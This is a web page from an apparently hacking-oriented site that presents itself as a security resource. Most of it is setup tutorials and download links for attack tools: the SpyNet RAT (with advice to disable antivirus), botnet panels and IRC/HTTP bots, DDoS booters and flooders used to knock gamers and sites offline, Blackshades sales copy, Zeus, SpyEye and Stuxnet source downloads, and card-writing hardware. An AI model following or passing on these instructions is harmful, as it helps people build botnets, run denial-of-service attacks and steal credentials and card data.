Airdemon Network Security
This website focuses on Network and Information Security. It offers you the necessary information to protect you from Information- and Cybercrime. This site explains the usage of the most important security tools and malware. Including the Password Cracking Guide and many tutorials. You can download the software also from this website.
THE LATEST NEWS ABOUT SECURITY AND HACKING
For the latest news updates about network security and hacking go to our news page here
For news about Anonymous here and AntiSec here
How to setup SpyNet
Start with downloading:
- Spy-Net 2.7
- No-IP Client (https://www.no-ip.com/downloads.php)
- WinRAR (http://www.rarlab.com/)
Extract everything to your desktop. Enter no-ip.com and register. After registration just login. Once logged in you enter 'Add Host'. You will redirect to the page were you can add a host.
For a hostname you can choose what you want your hostname to be. Once you've choosed your hostname press 'Create Host' at the bottom of the page. Your No-Ip Host is ready. Install the DUC Client that you downloaded from no-ip,com and install it. Once installed you have to login with your after that you will see your host with a checkbox. When you have done everything good you will see a 'smiley' next to your hostname.
Now go to the Spy Net folder you extracted in the beginning and open it. (Turn off your AV first before extracting the file because it will be detected as a virus). Open SpyNet.exe. Read more here
Optima_cp botnet setup
First you have to register a free website hosting or VPS account with MySQL Databases and MyPHPAdmin. Free website provider often don't allow botnet hosting and for security reasons the time limit ,set_time_limit (0), of your botnet or DDoS script is disabled.
After registration of a account upload all the files you extract from the RAR file to your server. Without the folders 'info' and 'sql. Ýou can use FileZilla Client (http://filezilla-project.org/download.php) for upload the files.
IMPORTANT: After you had upload the files go in FileZilla (to the box with the files you just uploaded) to the folder 'inc' and open it. There you will see a file 'config.php'. Click on it with the right mouse button. A box will appear and on the bottom you can change the values. That's calles CHMOD. Set the value on 666. And refresh FileZilla.
Go to your Cpanel (Control Panel) of your website. Search for MySQL Databases and click on it. Create MySQL DataBase. Now you have a SQL database name, username and password. Next search in Cpanel for MyPHPAdmin and click on it. In the left top corner you will see your SQL Ddatabase name. Click on it and click on the option 'SQL'. Now you will see a empty box. Read more here
Anonymous attacker package by Maxpain
The first one is Anonymous external attack and allows you to execute a UDP flood web attack. This tool was made as external of LOIC, the following package contains:
#Anonymous External Attack - A console application made in C# that allows you to flood the websites with anonymous style and sending 4096 packets each second. The program delays some seconds for each packet that it makes, so it flood effectively without lagging your own connections. Cool for DDoS attacks.
#Anonymous DNS Extractor - Extracts the DNS and ip servers of the following website, Developer included this program, cause in the target ip of AEA - anonymous external attack you need to use an IP. Read more here
Both of the programs are really light and console applications, by giving you the ultimate experience web attack. These tools are available to download here.
Credit card reading/writing with MSR 206
A bank card number is the primary account number found on credit cards and bank cards. It has a certain amount of internal structure and shares a common numbering scheme. Credit card numbers are a special case of ISO/IEC 7812 bank card numbers. An ISO/IEC 7812 number is typically 16 digits in length. It consists of:
- A six-digit Issuer Identification Number (IIN), the first digit of which is the Major Industry Identifier (MII)
- A variable length (up to 12 digits) individual account identifier
- A single check digit calculated using the Luhn algorithm
Magnetic Swipe Card Reader/Writer MSR206 is designed to offer a card reading/writing solution for ISO 7811/1~6 formats. It reads and writes up to 3 tracks of data, e.g. decoding/encoding and verifying up to 3 tracks of data simultaneously. Also, MSR206 Reader/Writer provides a standard RS-232 interface to communicate with host system or other terminal computers. That will attractively complement an existing system. Read more here
Dos via Putty - No shells or Bots needed
How to set your VPS to DoS by installing a perl script which will then allow ,if set up right to take down small sites and almost every opponent off XBL , PSN even take down CSS servers. Allowing you to hold a person offline for as long as you want with no restrictions.
Ordering your VPS - Choose any location but USA ! Then choose Ubuntu as operating system leave everything else the same fill out info then check out.
Download PuTTY here - Once you got your VPS login info put your VPS ip address on the top of the PuTTY bar then proceed by clicking it open. A white screen should pop up. Click ok.
Logging in putty - Once you have clicked 'ok' on the white pop up ,a black screen asking for username should show up. PuTTY will ask your VPS username. And after that your VPS password. Click enter. Read more here
Setup IRC Bot advanced
- Download the following software:
- Microsoft Visual Studio 6 or Microsoft Visual C++ 6.0 Standard Edition here
- Microsoft Visual Studio 6 Service Pack 5 here
- Microsoft Visual Studio 6.0 Processor Pack here
- Microsoft Platform SDK here
- IRCPlus 1.5 here
- IRCPlus 1.5 crack or patch here
- mIRC v7.22 here
- RxBot 7.5 here
- Bot source rx-asn-2-re-worked_v3.rar here
Register a no-ip account http://www.no-ip.com/
Run Microsoft Visual C++ 6.0 setup.exe and install it. You can find the serial in the folder. Install Microsoft Visual Studio 6 Service Pack 5 and Microsoft Platform SDK.
Open up Microsoft Visual C++ 6.0 Compilier. Go to Tools - Options and click the 'Directories' tab. Browse to these directories (below) and add them to the list. Click the dotted box to add and make sure they go in this order.
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB
Goto no-ip.com and make an account. Setup a free Host redirect for example botnet.no-ip.info. Download from the website also your No-IP Dynamic DNS Update Client. You can install the No-IP Dynamic DNS Update Client. Read more here
AnonTiny 0.8 has been released
This AnonTiny SE (Special Edition) 0.8 is specifically a remake of AnonTiny to help fix up the many complains that people had about the old one. New in AnonTiny 0.8: We now have FTP over tor capability.
Though the package is a bit tad bigger and is pushing the definition of Tiny. Know of any good small webbrowser/IRC/ FTP, with Sock proxy support. Also ssl support was added so that you can optionally secure your connection to the IRC server with ssl. Read more here
Download AnonTiny 0.8 here
jTorchat
jTorchat stands for Java Torchat, and is a complete rewrite of the popular p2p IM messenger Torchat. The underlying protocol of jtorchat is based on python Torchat. Accessible to All. Alive and connected to All. Transparent to All. Read more here
Download jTorchat 0.7.4 here
Download jTorchat 0.7.1b - obfsproxy (Iran version) here
How to make a shell booter
With a shell booter you can perform a UDP flood attack wich is a Denial of Service (DoS) attack using the User Datagram Protocol (UDP), a sessionless/connectionless computer networking protocol.
There are a lot of webhost's and most of the booters are running on PuTTY servers but this tutorial is about web based booter. Now you need to download a free booter source. But you can download two free booter sources here (Prodigy booter source) and here (Team 313 booter source). You need to download FileZilla (client) to upload the booter source and WinZip or WinRAR to unpack the files.
You also need a Shell Checker and can download here the .exe file. Login to your hosting provider. If you dont know your login info go to your email account and the web host provider should have sent the login info. Open your cPanel (Control Panel) and once your logged in to the cPanel search for Databases and click on MySQL Databases. Read more here
Setup a IRC Bot
An IRC bot is a set of scripts or an independent program that connects to Internet Relay Chat as a client, and so appears to other IRC users as another user. An IRC bot differs from a regular client in that instead of providing interactive access to IRC for a human user, it performs automated functions.
Often, an IRC bot is deployed as a detached program running from a stable host. It sits on an IRC channel to keep it open and prevents malicious users from taking over the channel. It can be configured to give channel operator status to privileged users when they join the channel, and can provide a unified channel operator list. Many of these features require that the bot be a channel operator.
Thus, most IRC bots are run from computers which have long uptimes (generally running a BSD derivative or Linux) and a fast, stable Internet connection. As IRC has become popular with many dial-up users as well, special services have appeared that offer limited user-level access to a stable Linux server with a decent connection. The user may run an IRC bot from this shell account. These services are commonly known as shell providers. Read more setup a IRC Bot here
Setup a HTTP Bot - From the developers of µBot
µBOT is a stable HTTP bot created for the use of herding and is perfect for collecting thousands of bots at an affordable price. The simple to use interface and reliable bot allows you to control your botnet with confidence, knowing your bots are safe and stable is what botnet masters need most, and this is what they provide to you with µBOT. Read more installing uBot here
Download uBot here
Index of IRC Bots
An IRC bot is a set of scripts or an independent program that connects to Internet Relay Chat as a client, and so appears to other IRC users as another user. An IRC bot differs from a regular client in that instead of providing interactive access to IRC for a human user, it performs automated functions.
Index of IRC Bots
agobot3-0.2.1-pre4-fix1-priv-mod.rar
For more IRC Bots here
BackBox Linux 2.01 Released ! ~ Penetration Testing Distribution
BackBox released BackBox Linux v2.01 .The new release include features such as Ubuntu 11.04, Linux Kernel 2.6.38 and Xfce 4.8.0. BackBox is a Linux distribution based on Ubuntu. It has been developed to perform penetration tests and security assessments. Designed to be fast, easy to use and provide a minimal yet complete desktop environment, thanks to its own software repositories, always being updated to the latest stable version of the most used and best known ethical hacking tools. Read more about BackBox Linux 2.01 here
The ISO image 32bit can be downloaded here
The ISO image 64bit can be downloaded here
Blackshades Bot [HTTP] V2
The bot is coded in Visual Basic 6, and is not reliant on any external ocx besides the Visual Basic runtime files, which have been shipped with operating systems since at least Windows 2000/ME. It does not come FUD, so you will need a crypter if you want it fully undetected. You will also need webhosting.
Every Bot has the following functions:
- Download and Execute
- Update
- Uninstall
To get more functions you must buy the modules. If you would like to purchase through AlertPay, LR, or WMZ, Please visit bshades.eu. Buying through PayPro IS automated. Please not that to buy, you DO NOT need to contact us unless you are paying via Liberty Reserve, AlertPay or WebMoney. There is a purchase link above for paypal, card, moneybookers. Feel free to contact us with any questions and concerns by the following methods: Submitting a ticket on bshades.eu. Read more about Blackshades Bot [HTTP] V2 here
Free Blackshades Tools
Blackshades NET 4.8 is a very advanced Remote Administration Tool coded in Visual Basic 6. VB6 is not as limited and useless as you think. This RAT has no dependencies (.NET Framework, java, etc) and works extremely well. Now Blackshades is offering free tools. Read more about Free Blackshades Tools hereBlackshades MalDetect verifies received executables. MalDetect is a system-optimization tool. It removes unused and temporary files from your system, allowing it to run faster and more efficiently, and giving you more hard-disk space.
The application cleans traces left by Windows, Internet Explorer, and third-party applications. MalDetect also removes general malware by searching for suspect API calls made by running application.
Download Blackshades MalDetect here
Blackshades - Password viewer recover almost any lost password.
Download Blackshades - Password Viewer here
Blackshades Remote Controller - Lite Edition is a very advanced Remote Administration Tool coded in Visual Basic 6.
Download Blackshades Remote Controller - Lite Edition here
th3j35t3r's DDOS tool XerXes
The attack tool he's developed called Xerxes originally made use (according to him) of a flaw in the Apache web server but has since been modified to attack other web server types as well. In essence all of these flaws are requests you can send a web server that causes the web server to expend additional resources to determine that it is an invalid request. Flooding the web server with enough of these requests causes the web server to be unable to respond to any legitimate http requests from users attempting to visit the web site or web based resource. Read more and download the source code of XerXes DDoS tool here
LOIC Network Stresser
Low Orbit Ion Cannon is an Open Source Network Stress testing application written in C#. LOIC performs a Denial of Service (DoS) attack on a target site by flooding the server with TCP packets or UDP packets with the intention of disrupting the service of a particular host.If an attack is not routed through an anonymization network such as Tor, traceable IP address records can be logged by its recipient. More about the usage of LOIC here
Download LOIC v1.1.1.25 here
Download NewEraCracker LOIC 1.1.1.25 here
Download NewEraCracker LOIC 1.1.1.25 (tar) here
#RefRef - Denial of Service (DDoS) tool developed by Anonymous released
Second Attack to test the aplication - #RefRef executed in Perl - Anonymous
Download #RefRef here and read more about #RefRef source code in Perl here
Crimeware Toolkits and Botnets
Zeus (also known as Zbot, PRG, Wsnpoem, Gorhax and Kneber) is a Trojan horse that steals banking information by keystroke logging. Zeus is spread mainly through drive-by downloads and phishing schemes. First identified in July 2007 when it was used to steal information from the United States Department of Transportation, it became more widespread in March 2009. In June 2009, security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of such companies as the Bank of America, NASA, Monster, ABC, Oracle, Cisco, Amazon, and BusinessWeek. For more information about Zeus click here...
Download the Zeus source-code here
RAR password is zeus
SpyEye V1.0 is a toolkit emanating from Russia (known as SpyEye V1.0) and started to appear for sale on Russian underground forums. Retailing at $500. Security experts detects this threat as Trojan.Spyeye. SpyEye could be a future contender for king of the crimeware toolkits. The SpyEye toolkit is similar to Zeus. It contains a builder module for creating the Trojan bot executable with config file and a Web control panel for command and control (C&C) of a Botnet.
Download SpyEye v1.3.45 Loader here
Stuxnet looks for industrial control systems and then changes the code in them to allow the attackers to take control of these systems without the operators knowing. In other words, this threat is designed to allow hackers to manipulate real-world equipment, which makes it very dangerous. W32.Stuxnet always sends the IP address, name of the computer, and name of the workgroup or domain they were a part of to the command-and-control server. For more information about Stuxnet click here...
Download the Stuxnet source-code here
Encryption
Find WPA2-PSK encryption keys of Thompson and SpeedTouch routers with the STKey default WPA2-PSK key generator. Download the STKey default WPA2-PSK key generator for Thomson and SpeedTouch series here and the STKey2-GUI here
For more information about the default WPA2-PSK encryption key generator for Thompson and SpeedTouch routers click here...
Hash Code Cracker 1.2 is a tool that recover the original text from the Hash codes. This tool uses dictionary attackS to crack the MD5,SHA,NTLM(windows) Hashes. It is free open source (GPL licensed) program. dictionary attack is method of recovering passwords using known passwords. In this method, the known passwords are listed in a dictionary file. The Hash code will be compared with the known passsword's hashes. If it finds any matches, it will return the password.
Hash Code Cracker 2.1 uses Dictionary Attack. It takes sample words from word list (often called as dictionary) ,generate hashes for each words, then it will compared with the Hash code that you want to crack. It can perform variety of changes(case changes,reversing words,etc..) in the words and generate hashes. Now It supports Online Cracking. For more information about Hash Code Cracker 2.1 click here...
Download the latest community-enhanced version (release notes) John the Ripper 1.7.8-jumbo-7 here
John the Ripper 1.7.8-jumbo-7 Released This version integrates lots of contributed patches adding support for over 40 of additional hash and cipher types (including popular ones such as NTLM, raw MD5, etc.), as well as some optimizations and features. Unfortunately, its overall quality is lower than the official version's. Requires OpenSSL 0.9.7 or newer. There are unofficial binary builds (by John the Ripper user community members) for Windows, Linux, Solaris, and Mac OS X.
NOTE: A few Windows "antivirus" and "anti-spyware" products have started to recognize password recovery tools as if they were "trojans". This is how those products' vendors inflate their detected "virus" counts. The effect is that end-users are no longer able to check password recovery software for real viruses. For more information about (and download of) John the Ripper 1.7.8-jumbo-7 click here...
The Google Ad Sense account of Airdemon Network Security has been suspended. This was the email Google send to us:
After carefully reviewing our records we found that Your AdSense account may generate invalid activity. Your outstanding balance and the share of the revenue that Google would receive will be fully refunded to the appropriate advertisers.
The Google Ad Sense Team
But the reason is nonsense. It's all about the content of the website. The support of Wikileaks and the information about the U.S. Government and U.S.